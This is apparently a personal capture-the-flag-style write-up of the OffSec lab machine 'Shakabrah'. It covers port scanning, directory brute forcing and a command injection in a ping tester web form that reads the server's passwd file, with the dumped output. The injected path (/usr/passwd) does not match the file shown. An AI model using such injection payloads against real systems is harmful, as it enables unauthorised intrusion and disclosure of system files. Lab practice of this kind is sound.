Nmap

Offsec - Shakabrah - Jun 17th, 2023

1337 Sheets
1337 Sheets
·
Offsec - Shakabrah - Jun 17th, 2023

Enumeration

Target IP given is: [LAB_IP]

Got OpenVAS working just for fun via docker. Only able to check the services and their versions for CVE's. No deep auto webapp vuln checking or exploitation from default scans.

Nmap

nmap -p- -sV -sC --open -T4 [LAB_IP] -oN shakabrah_nmap.txt

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:57 GMT

Nmap scan report for [LAB_IP]

Host is up (0.053s latency).

Not shown: 65533 filtered tcp ports (no-response)

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   2048 [HASH_REDACTED] (RSA)

|   256 [HASH_REDACTED] (ECDSA)

|_  256 [HASH_REDACTED] (ED25519)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

|_http-server-header: Apache/2.4.29 (Ubuntu)

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 167.03 seconds

##Dirbuster

Using /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Starting OWASP DirBuster 1.0-RC1

Starting dir/file list based brute forcing

File found: /index.php - 200

Dir found: / - 200

Dir found: /icons/ - 403

Dir found: /icons/small/ - 403

Nothing of note

##Site

It's a ping connection tester

https://i.imgur.com/pI8h8AF.png

Maybe I can do command injection / RCE

Running command behind ping

127.0.0.1 && cat /usr/passwd

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.027 ms

64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.022 ms

64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.037 ms

64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.028 ms

--- 127.0.0.1 ping statistics ---

4 packets transmitted, 4 received, 0% packet loss, time 3062ms

rtt min/avg/max/mdev = 0.022/0.028/0.037/0.007 ms

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin